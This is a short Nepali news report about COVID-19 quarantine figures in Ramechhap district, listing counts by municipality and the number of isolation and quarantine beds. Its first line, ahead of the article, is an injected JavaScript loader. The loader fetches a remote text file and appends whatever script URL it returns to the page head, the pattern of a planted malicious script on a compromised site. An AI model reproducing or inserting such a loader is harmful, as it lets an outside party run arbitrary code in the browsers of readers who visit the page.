;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
साउन १६,
रामेछाप । जिल्लाका विभिन्न पालिकाहरुमा शुक्रबार अर्थात आजसम्म ६५ जना क्वारेन्टिनमा रहेका छन । ८ जना महिला र ५७ जना पुरुष गरि ६५ जना क्वारेन्टिनमा रहेको स्वास्थ्य कार्यालय रामेछापका निमित्त प्रमुख कर्णले जानकारी दिनुभयो ।
उहाँका अनु्सार अनुसार मन्थली नगरपालिकामा ३२ , गोकुलगंगा गाउँपालिकामा १२ , दोरम्बा गाउँपालिकामा ३ , लिखुतामाकोशी गाउँपालिकामा ५ र सुनापति गाउँपालिकामा १३ गरी जिल्लाभर ६५ जना क्वारेन्टिनमा रहेका छन् ।
रामेछाप नगरपालिका , उमाकुण्ड र खाँडादेवी गाउँपालिकामा भने कोहि पनि व्यक्ति क्वारेन्टिनमा बसेका छैनन् । जिल्लामा अहिलेसम्म १ सय ९ बेडको आइसोलेशन कक्ष र ५ सय ९ बेडको क्वारेन्टिन कक्ष स्थापना गरिएको छ ।file Photo
फेसबुक प्रतिक्रियाहरु